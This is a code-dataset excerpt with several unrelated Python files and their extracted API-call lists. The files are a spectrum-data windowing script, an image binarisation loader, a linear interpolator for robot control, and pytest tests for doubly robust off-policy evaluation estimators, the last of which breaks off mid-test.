Utils.AnnotationTools import annotate_segmentation\n'), ((6706, 6797), 'cv2.imshow', 'cv2.imshow', (['f"""face_parsing_with_bbox_result_image"""', 'face_parsing_with_bbox_result_image'], {}), "(f'face_parsing_with_bbox_result_image',\n face_parsing_with_bbox_result_image)\n", (6716, 6797), False, 'import cv2\n'), ((6798, 6812), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (6809, 6812), False, 'import cv2\n'), ((6817, 6840), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (6838, 6840), False, 'import cv2\n'), ((2746, 2794), 'Utils.GeometryUtils.resize_with_long_side', 'resize_with_long_side', (['corrected_face_image', '(512)'], {}), '(corrected_face_image, 512)\n', (2767, 2794), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n'), ((2910, 3023), 'Utils.GeometryUtils.center_pad_image_with_specific_base', 'center_pad_image_with_specific_base', (['resized_image'], {'_width_base': '(512)', '_height_base': '(512)', '_output_pad_ratio': '(True)'}), '(resized_image, _width_base=512,\n _height_base=512, _output_pad_ratio=True)\n', (2945, 3023), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n'), ((4076, 4177), 'cv2.resize', 'cv2.resize', (['semantic_index_without_pad', '(original_w, original_h)'], {'interpolation': 'cv2.INTER_NEAREST'}), '(semantic_index_without_pad, (original_w, original_h),\n interpolation=cv2.INTER_NEAREST)\n', (4086, 4177), False, 'import cv2\n'), ((1381, 1514), 'Utils.InferenceHelpers.TritonInferenceHelper', 'TritonInferenceHelper', (['"""FaceParsing"""', "self.inference_config['triton_url']", "self.inference_config['triton_port']", '"""FaceParsing"""', '(1)'], {}), "('FaceParsing', self.inference_config['triton_url'],\n self.inference_config['triton_port'], 'FaceParsing', 1)\n", (1402, 1514), False, 'from Utils.InferenceHelpers import TritonInferenceHelper\n'), ((2249, 2309), 'numpy.zeros', 'np.zeros', (['(_image.shape[1], _image.shape[0])'], {'dtype': 'np.uint8'}), '((_image.shape[1], _image.shape[0]), dtype=np.uint8)\n', (2257, 2309), True, 'import numpy as np\n'), ((2417, 2465), 'Utils.GeometryUtils.correct_face_orientation', 'correct_face_orientation', (['_image', '_landmark_info'], {}), '(_image, _landmark_info)\n', (2441, 2465), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n'), ((3117, 3157), 'Utils.GeometryUtils.force_convert_image_to_bgr', 'force_convert_image_to_bgr', (['padded_image'], {}), '(padded_image)\n', (3143, 3157), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n')]
|
import numpy as np
import os
import pickle
import joblib
import sys
import glob
import torch
window_size = 1000
normality = str(sys.argv[1]) # e.g. abnormal
source = str(sys.argv[2]) # e.g. ryerson_ab_train_sigOver
outname = '{}_{}.npy'.format(source, normality)
input_path = '/net/adv_spectrum/data/feature/downsample_10/{}/{}/1000_250/'.format(normality, source)
output_path = '/net/adv_spectrum/array_data/{}'.format(outname)
def array_to_window(X, window_size):
"""
Inputs:
X (np.array): Its shape should be (n_time_steps, 128)
window_size (int): the number of time steps in a window
Return:
result (np.array): Its shape should be (n_windows, 1, window_size, 128)
"""
result = []
ind = np.arange(0, X.shape[0], window_size)
for start, end in zip(ind, np.r_[ind[1:], X.shape[0]]):
if end - start < window_size:
# Discard the last few lines
break
result.append(X[start:end, :])
return np.array(result)
def txt_to_series(file_path, n_channels=128):
features = []
with open(file_path, 'r') as f:
for line in f:
x = line.split()
features.append(x)
series = np.array(features).reshape((-1, n_channels)).astype('float64')
return series
series_list = []
print('Start constructing normal series....')
for filename in sorted(glob.glob(input_path + '*.txt')):
print(filename)
series = txt_to_series(filename)
print(series.shape)
series_list.append(series)
X_full= array_to_window(series_list.pop(0), window_size)
for i, X in enumerate(series_list):
print('Converting the {}th array to window...'.format(i))
X_windowed = array_to_window(X, window_size)
print('Concatenating...\n')
X_full = np.concatenate((X_full, X_windowed), axis=0)
print('Done converting and concatenating!')
np.save(output_path, X_full)
print('The array has been saved at {}'.format(output_path))
|
[
"numpy.save",
"numpy.array",
"numpy.arange",
"glob.glob",
"numpy.concatenate"
] |
[((1864, 1892), 'numpy.save', 'np.save', (['output_path', 'X_full'], {}), '(output_path, X_full)\n', (1871, 1892), True, 'import numpy as np\n'), ((744, 781), 'numpy.arange', 'np.arange', (['(0)', 'X.shape[0]', 'window_size'], {}), '(0, X.shape[0], window_size)\n', (753, 781), True, 'import numpy as np\n'), ((991, 1007), 'numpy.array', 'np.array', (['result'], {}), '(result)\n', (999, 1007), True, 'import numpy as np\n'), ((1377, 1408), 'glob.glob', 'glob.glob', (["(input_path + '*.txt')"], {}), "(input_path + '*.txt')\n", (1386, 1408), False, 'import glob\n'), ((1773, 1817), 'numpy.concatenate', 'np.concatenate', (['(X_full, X_windowed)'], {'axis': '(0)'}), '((X_full, X_windowed), axis=0)\n', (1787, 1817), True, 'import numpy as np\n'), ((1208, 1226), 'numpy.array', 'np.array', (['features'], {}), '(features)\n', (1216, 1226), True, 'import numpy as np\n')]
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import numpy as np
from PIL import Image
import pylab as pl
import matplotlib.cm as cm
def int2B(pat, binary=True):
_ = np.array(pat, float)
for i in range(len(_)):
for j in range(len(_[i])):
if binary:
if pat[i][j] > 130:
_[i][j] = 1
else:
_[i][j] = 0
else:
if j > 75:
_[i][j] = 1
else:
_[i][j] = -1
r = np.array(_, float).reshape(1,54000).flatten()
return r
un = np.array(Image.open('data/picture/1.jpg').convert('L'))
deux = np.array(Image.open('data/picture/2.jpg').convert('L'))
trois = np.array(Image.open('data/picture/3.jpg').convert('L'))
quatre = np.array(Image.open('data/picture/4.jpg').convert('L'))
visages = [int2B(un), int2B(deux), int2B(trois), int2B(quatre)]
|
[
"numpy.array",
"PIL.Image.open"
] |
[((169, 189), 'numpy.array', 'np.array', (['pat', 'float'], {}), '(pat, float)\n', (177, 189), True, 'import numpy as np\n'), ((613, 645), 'PIL.Image.open', 'Image.open', (['"""data/picture/1.jpg"""'], {}), "('data/picture/1.jpg')\n", (623, 645), False, 'from PIL import Image\n'), ((676, 708), 'PIL.Image.open', 'Image.open', (['"""data/picture/2.jpg"""'], {}), "('data/picture/2.jpg')\n", (686, 708), False, 'from PIL import Image\n'), ((740, 772), 'PIL.Image.open', 'Image.open', (['"""data/picture/3.jpg"""'], {}), "('data/picture/3.jpg')\n", (750, 772), False, 'from PIL import Image\n'), ((805, 837), 'PIL.Image.open', 'Image.open', (['"""data/picture/4.jpg"""'], {}), "('data/picture/4.jpg')\n", (815, 837), False, 'from PIL import Image\n'), ((538, 556), 'numpy.array', 'np.array', (['_', 'float'], {}), '(_, float)\n', (546, 556), True, 'import numpy as np\n')]
|
import numpy as np
from ...utils import transform_utils as T
from .base_interpolator import Interpolator
class LinearInterpolator(Interpolator):
"""
Simple class for implementing a linear interpolator.
Abstracted to interpolate n-dimensions
Args:
max_delta: Maximum single change in dx allowed by the system.
Note that this should be in units magnitude / step
ndim: Number of dimensions to interpolate
controller_freq: Frequency (Hz) of the controller
policy_freq: Frequency (Hz) of the policy model
ramp_ratio: Percentage of interpolation timesteps across which we will interpolate to a goal position.
Note: Num total interpolation steps will be equal to np.floor(ramp_ratio * controller_freq / policy_freq)
i.e.: how many controller steps we get per action space update
use_delta_goal: Whether to interpret inputs as delta goals from a current position or absolute values
ori_interpolate: Whether this interpolator is interpolating angles (orientation) or not
"""
def __init__(self,
max_delta,
ndim,
controller_freq,
policy_freq,
ramp_ratio=0.2,
use_delta_goal=False,
ori_interpolate=False,
):
self.max_delta = max_delta # Maximum allowed change per interpolator step
self.goal = None # Requested goal
self.start = None # Start state
self.dim = ndim # Number of dimensions to interpolate
self.order = 1 # Order of the interpolator (1 = linear)
self.step = 0 # Current step of the interpolator
self.total_steps = \
np.ceil(ramp_ratio * controller_freq / policy_freq) # Total num steps per interpolator action
self.use_delta_goal = use_delta_goal # Whether to use delta or absolute goals (currently
# not implemented yet- TODO)
self.ori_interpolate = ori_interpolate # Whether this is interpolating orientation or not
def set_goal(self, goal, start=None):
"""
set_goal: Takes a requested goal and updates internal parameters for next interpolation step
Args:
goal: Requested goal (either absolute or delta value). Should be same dimension as self.dim
start: Only relevant if "self.use_delta_goal" is set. This is the current state from which
the goal will be taken relative to
Returns:
None
"""
# First, check to make sure requested goal shape is the same as self.dim
if goal.shape[0] != self.dim:
print("Requested goal: {}".format(goal))
raise ValueError("LinearInterpolator: Input size wrong for goal; got {}, needs to be {}!".format(
goal.shape[0], self.dim))
# Update goal and save start state
self.goal = np.array(goal)
self.start = start
# Reset interpolation steps
self.step = 0
def get_interpolated_goal(self, x):
"""
get_interpolated_goal: Takes the current state and provides the next step in interpolation given
the remaining steps.
NOTE: If this interpolator is for orientation, it is assumed to be receiving
Args:
x: Current state. Should be same dimension as self.dim
NOTE: If this interpolator is for orientation, x is assumed to be the current relative rotation from
the initial goal that was set. Otherwise, it is assumed to be an absolute value
Returns:
x_current: Next position in the interpolated trajectory
"""
# First, check to make sure x in same shape as self.dim
if x.shape[0] != self.dim:
print("Current position: {}".format(x))
raise ValueError("LinearInterpolator: Input size wrong; needs to be {}!".format(self.dim))
# Also make sure goal has been set
if self.goal is None:
raise ValueError("LinearInterpolator: Goal has not been set yet!")
# Calculate the desired next step based on remaining interpolation steps
if self.ori_interpolate:
# This is an orientation interpolation, so we interpolate linearly around a sphere instead
goal = self.goal
if self.dim == 3:
# this is assumed to be euler (x,y,z), so we need to first map to quat
x = T.mat2quat(T.euler2mat(x))
goal = T.mat2quat(T.euler2mat(self.goal))
# Interpolate to the next sequence
x_current = T.quat_slerp(x, goal,
fraction=(self.step + 1) / self.total_steps)
# Check if dx is greater than max value; if it is; clamp and notify user
dx, clipped = T.clip_rotation(T.quat_distance(x_current, x), self.max_delta)
if clipped:
print(
"LinearInterpolator: WARNING: Requested interpolation (ori) exceeds max speed;"
"clamping to {}.".format(dx))
# Map back to euler if necessary
x_current = dx
if self.dim == 3:
x_current = T.mat2euler(T.quat2mat(x_current))
else:
# This is a normal interpolation
dx = (self.goal - x) / (self.total_steps - self.step)
# Check if dx is greater than max value; if it is; clamp and notify user
dx, clipped = T.clip_translation(dx, self.max_delta)
if clipped:
print("LinearInterpolator: WARNING: Requested interpolation "
"exceeds max speed; clamping to {}.".format(dx))
x_current = x + dx
# Increment step if there's still steps remaining based on ramp ratio
if self.step < self.total_steps - 1:
self.step += 1
# Return the new interpolated step
return x_current
|
[
"numpy.array",
"numpy.ceil"
] |
[((2000, 2051), 'numpy.ceil', 'np.ceil', (['(ramp_ratio * controller_freq / policy_freq)'], {}), '(ramp_ratio * controller_freq / policy_freq)\n', (2007, 2051), True, 'import numpy as np\n'), ((3292, 3306), 'numpy.array', 'np.array', (['goal'], {}), '(goal)\n', (3300, 3306), True, 'import numpy as np\n')]
|
import re
import pytest
import numpy as np
import torch
from obp.types import BanditFeedback
from obp.ope import (
DirectMethod,
DoublyRobust,
DoublyRobustWithShrinkage,
SwitchDoublyRobust,
SelfNormalizedDoublyRobust,
)
from conftest import generate_action_dist
# prepare instances
dm = DirectMethod()
dr = DoublyRobust()
dr_shrink_0 = DoublyRobustWithShrinkage(lambda_=0.0)
dr_shrink_max = DoublyRobustWithShrinkage(lambda_=1e10)
sndr = SelfNormalizedDoublyRobust()
switch_dr_0 = SwitchDoublyRobust(tau=0.0)
switch_dr_max = SwitchDoublyRobust(tau=1e10)
dr_estimators = [dr, dr_shrink_0, sndr, switch_dr_0]
# dr and self-normalized dr
# action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description
invalid_input_of_dr = [
(
generate_action_dist(5, 4, 3),
None,
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
None,
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"reward must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
None,
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"pscore must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
None,
"estimated_rewards_by_reg_model must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=float),
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action elements must be non-negative integers",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int) - 1,
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action elements must be non-negative integers",
),
(
generate_action_dist(5, 4, 3),
"4",
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros((3, 2), dtype=int),
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action must be 1-dimensional",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int) + 8,
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action elements must be smaller than the second dimension of action_dist",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
"4",
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"reward must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros((3, 2), dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"reward must be 1-dimensional",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(4, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action and reward must be the same size.",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
"4",
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"pscore must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.ones((5, 3)),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"pscore must be 1-dimensional",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.ones(4),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action, reward, and pscore must be the same size.",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.arange(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"pscore must be positive",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 2)),
"estimated_rewards_by_reg_model.shape must be the same as action_dist.shape",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
"4",
"estimated_rewards_by_reg_model must be ndarray",
),
]
@pytest.mark.parametrize(
"action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description",
invalid_input_of_dr,
)
def test_dr_using_invalid_input_data(
action_dist: np.ndarray,
action: np.ndarray,
reward: np.ndarray,
pscore: np.ndarray,
position: np.ndarray,
estimated_rewards_by_reg_model: np.ndarray,
description: str,
) -> None:
# estimate_intervals function raises ValueError of all estimators
for estimator in [dr, sndr]:
with pytest.raises(ValueError, match=f"{description}*"):
_ = estimator.estimate_policy_value(
action_dist=action_dist,
action=action,
reward=reward,
pscore=pscore,
position=position,
estimated_rewards_by_reg_model=estimated_rewards_by_reg_model,
)
with pytest.raises(ValueError, match=f"{description}*"):
_ = estimator.estimate_interval(
action_dist=action_dist,
action=action,
reward=reward,
pscore=pscore,
position=position,
estimated_rewards_by_reg_model=estimated_rewards_by_reg_model,
)
# dr and self-normalized dr
# action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description
invalid_input_tensor_of_dr = [
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
None,
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
None,
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"reward must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
None,
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"pscore must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
None,
"estimated_rewards_by_reg_model must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.float32),
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action elements must be non-negative integers",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64) - 1,
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action elements must be non-negative integers",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
"4",
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros((3, 2), dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action must be 1-dimensional",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64) + 8,
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action elements must be smaller than the second dimension of action_dist",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
"4",
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"reward must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros((3, 2), dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"reward must be 1-dimensional",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(4, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action and reward must be the same size.",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
"4",
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"pscore must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones((5, 3)),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"pscore must be 1-dimensional",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones(4),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action, reward, and pscore must be the same size.",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.from_numpy(np.arange(5)),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"pscore must be positive",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 2)),
"estimated_rewards_by_reg_model.shape must be the same as action_dist.shape",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
"4",
"estimated_rewards_by_reg_model must be Tensor",
),
]
@pytest.mark.parametrize(
"action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description",
invalid_input_tensor_of_dr,
)
def test_dr_using_invalid_input_tensor_data(
action_dist: torch.Tensor,
action: torch.Tensor,
reward: torch.Tensor,
pscore: torch.Tensor,
position: torch.Tensor,
estimated_rewards_by_reg_model: torch.Tensor,
description: str,
) -> None:
# estimate_intervals function raises ValueError of all estimators
for estimator in [dr, sndr]:
with pytest.raises(ValueError, match=f"{description}*"):
_ = estimator.estimate_policy_value_tensor(
action_dist=action_dist,
action=action,
reward=reward,
pscore=pscore,
position=position,
estimated_rewards_by_reg_model=estimated_rewards_by_reg_model,
)
# switch-dr
invalid_input_of_switch = [
("a", "switching hyperparameter must be float or integer"),
(-1.0, "switching hyperparameter must be larger than or equal to zero"),
(np.nan, "switching hyperparameter must not be nan"),
]
@pytest.mark.parametrize(
"tau, description",
invalid_input_of_switch,
)
def test_switch_using_invalid_input_data(tau: float, description: str) -> None:
with pytest.raises(ValueError, match=f"{description}*"):
_ = SwitchDoublyRobust(tau=tau)
valid_input_of_switch = [
(3.0, "float tau"),
(2, "integer tau"),
]
@pytest.mark.parametrize(
"tau, description",
valid_input_of_switch,
)
def test_switch_using_valid_input_data(tau: float, description: str) -> None:
_ = SwitchDoublyRobust(tau=tau)
# dr-os
invalid_input_of_shrinkage = [
("a", "shrinkage hyperparameter must be float or integer"),
(-1.0, "shrinkage hyperparameter must be larger than or equal to zero"),
(np.nan, "shrinkage hyperparameter must not be nan"),
]
@pytest.mark.parametrize(
"lambda_, description",
invalid_input_of_shrinkage,
)
def test_shrinkage_using_invalid_input_data(lambda_: float, description: str) -> None:
with pytest.raises(ValueError, match=f"{description}*"):
_ = DoublyRobustWithShrinkage(lambda_=lambda_)
valid_input_of_shrinkage = [
(3.0, "float lambda_"),
(2, "integer lambda_"),
]
@pytest.mark.parametrize(
"lambda_, description",
valid_input_of_shrinkage,
)
def test_shrinkage_using_valid_input_data(lambda_: float, description: str) -> None:
_ = DoublyRobustWithShrinkage(lambda_=lambda_)
# dr variants
valid_input_of_dr_variants = [
(
generate_action_dist(5, 4, 3),
np.random.choice(4, size=5),
np.zeros(5, dtype=int),
np.random.uniform(low=0.5, high=1.0, size=5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
0.5,
"all argumnents are given and len_list > 1",
)
]
@pytest.mark.parametrize(
"action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description",
valid_input_of_dr_variants,
)
def test_dr_variants_using_valid_input_data(
action_dist: np.ndarray,
action: np.ndarray,
reward: np.ndarray,
pscore: np.ndarray,
position: np.ndarray,
estimated_rewards_by_reg_model: np.ndarray,
hyperparameter: float,
description: str,
) -> None:
# check dr variants
switch_dr = SwitchDoublyRobust(tau=hyperparameter)
dr_os = DoublyRobustWithShrinkage(lambda_=hyperparameter)
for estimator in [switch_dr, dr_os]:
est = estimator.estimate_policy_value(
action_dist=action_dist,
action=action,
reward=reward,
pscore=pscore,
position=position,
estimated_rewards_by_reg_model=estimated_rewards_by_reg_model,
)
assert est == 0.0, f"policy value must be 0, but {est}"
# dr variants
valid_input_tensor_of_dr_variants = [
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.from_numpy(np.random.choice(4, size=5)),
torch.zeros(5, dtype=torch.int64),
torch.from_numpy(np.random.uniform(low=0.5, high=1.0, size=5)),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
0.5,
"all argumnents are given and len_list > 1",
)
]
@pytest.mark.parametrize(
"action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description",
valid_input_tensor_of_dr_variants,
)
def test_dr_variants_using_valid_input_tensor_data(
action_dist: torch.Tensor,
action: torch.Tensor,
reward: torch.Tensor,
pscore: torch.Tensor,
position: torch.Tensor,
estimated_rewards_by_reg_model: torch.Tensor,
hyperparameter: float,
description: str,
) -> None:
# check dr variants
dr_os = DoublyRobustWithShrinkage(lambda_=hyperparameter)
for estimator in [dr_os]:
est = estimator.estimate_policy_value_tensor(
action_dist=action_dist,
action=action,
reward=reward,
pscore=pscore,
position=position,
estimated_rewards_by_reg_model=estimated_rewards_by_reg_model,
)
assert est.item() == 0.0, f"policy value must be 0, but {est.item()}"
def test_dr_using_random_evaluation_policy(
synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray
) -> None:
"""
Test the format of dr variants using synthetic bandit data and random evaluation policy
"""
expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis]
action_dist = random_action_dist
# prepare input dict
input_dict = {
k: v
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_dict["action_dist"] = action_dist
input_dict["estimated_rewards_by_reg_model"] = expected_reward
# dr estimtors require all arguments
for estimator in dr_estimators:
estimated_policy_value = estimator.estimate_policy_value(**input_dict)
assert isinstance(
estimated_policy_value, float
), f"invalid type response: {estimator}"
# remove necessary keys
del input_dict["reward"]
del input_dict["pscore"]
del input_dict["action"]
del input_dict["estimated_rewards_by_reg_model"]
for estimator in dr_estimators:
with pytest.raises(
TypeError,
match=re.escape(
"estimate_policy_value() missing 4 required positional arguments: 'reward', 'action', 'pscore', and 'estimated_rewards_by_reg_model'"
),
):
_ = estimator.estimate_policy_value(**input_dict)
# prepare input dict
input_tensor_dict = {
k: v if v is None else torch.from_numpy(v)
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_tensor_dict["action_dist"] = torch.from_numpy(action_dist)
input_tensor_dict["estimated_rewards_by_reg_model"] = torch.from_numpy(
expected_reward
)
# dr estimtors require all arguments
for estimator in dr_estimators:
if estimator.estimator_name == "switch-dr":
with pytest.raises(
NotImplementedError,
match=re.escape(
"This is not implemented for Swtich-DR because it is indifferentiable."
),
):
_ = estimator.estimate_policy_value_tensor(**input_tensor_dict)
else:
estimated_policy_value = estimator.estimate_policy_value_tensor(
**input_tensor_dict
)
assert isinstance(
estimated_policy_value, torch.Tensor
), f"invalid type response: {estimator}"
# remove necessary keys
del input_tensor_dict["reward"]
del input_tensor_dict["pscore"]
del input_tensor_dict["action"]
del input_tensor_dict["estimated_rewards_by_reg_model"]
for estimator in dr_estimators:
if estimator.estimator_name == "switch-dr":
with pytest.raises(
NotImplementedError,
match=re.escape(
"This is not implemented for Swtich-DR because it is indifferentiable."
),
):
_ = estimator.estimate_policy_value_tensor(**input_tensor_dict)
else:
with pytest.raises(
TypeError,
match=re.escape(
"estimate_policy_value_tensor() missing 4 required positional arguments: 'reward', 'action', 'pscore', and 'estimated_rewards_by_reg_model'"
),
):
_ = estimator.estimate_policy_value_tensor(**input_tensor_dict)
def test_boundedness_of_sndr_using_random_evaluation_policy(
synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray
) -> None:
"""
Test the boundedness of sndr estimators using synthetic bandit data and random evaluation policy
"""
expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis]
action_dist = random_action_dist
# prepare input dict
input_dict = {
k: v
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_dict["action_dist"] = action_dist
input_dict["estimated_rewards_by_reg_model"] = expected_reward
# make pscore too small (to check the boundedness of sndr)
input_dict["pscore"] = input_dict["pscore"] ** 3
estimated_policy_value = sndr.estimate_policy_value(**input_dict)
assert (
estimated_policy_value <= 2
), f"estimated policy value of sndr should be smaller than or equal to 2 (because of its 2-boundedness), but the value is: {estimated_policy_value}"
# prepare input dict
input_tensor_dict = {
k: v if v is None else torch.from_numpy(v)
for k, v in synthetic_bandit_feedback.items()
if k in ["reward", "action", "pscore", "position"]
}
input_tensor_dict["action_dist"] = torch.from_numpy(action_dist)
input_tensor_dict["estimated_rewards_by_reg_model"] = torch.from_numpy(
expected_reward
)
# make pscore too small (to check the boundedness of sndr)
input_tensor_dict["pscore"] = input_tensor_dict["pscore"] ** 3
estimated_policy_value = sndr.estimate_policy_value_tensor(**input_tensor_dict)
assert (
estimated_policy_value.item() <= 2
), f"estimated policy value of sndr should be smaller than or equal to 2 (because of its 2-boundedness), but the value is: {estimated_policy_value.item()}"
def test_dr_shrinkage_using_random_evaluation_policy(
synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray
) -> None:
"""
Test the dr shrinkage estimators using synthetic bandit data and random evaluation policy
"""
expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis]
action_dist = random_action_dist
# prepare input dict
input_dict = {
k: v
for k, v in synthetic_bandit_feedback.items()
